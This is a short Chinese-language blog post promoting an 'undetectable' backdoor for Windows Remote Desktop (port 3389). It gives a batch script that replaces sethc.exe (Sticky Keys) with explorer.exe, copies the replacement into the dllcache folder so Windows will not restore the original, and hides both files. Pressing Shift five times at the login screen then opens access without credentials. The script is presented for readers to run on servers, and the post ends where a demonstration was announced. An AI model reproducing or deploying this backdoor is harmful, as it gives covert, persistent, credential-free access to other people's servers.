永不查杀的3389后门其原理就是利用shift后门,连敲5次shift键既可以直接进入服务器。
前些天在群里有个小伙伴问了一句谁知道shift后门的代码,当时我给了他一个链接,我总是觉得这个百度下就能找到吧,我查了一下,发现什么都有,有的不全有的要么复杂,我也搞不懂一个代码还不能认真的给我们吗?非要让大家赏你几根辣条!
好了废话不多说,将下面的代码通过服务器上的DOS命令下执行即可,觉得麻烦的,可以将下面的代码写到记事本中保存然后将后缀名改成**.cmd 或者**.bat都是可以的哦,不要调皮,我们上代码。
3389十四大技巧只永不查杀的后门——shift后门代码:
@echo off
copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
attrib c:\windows\system32\sethc.exe +h
attrib c:\windows\system32\dllcache\sethc.exe +h
echo. & pause
Exit
然后你试试进入系统是按五次shift就可以进入了,下面是我的一个服务器上的实验: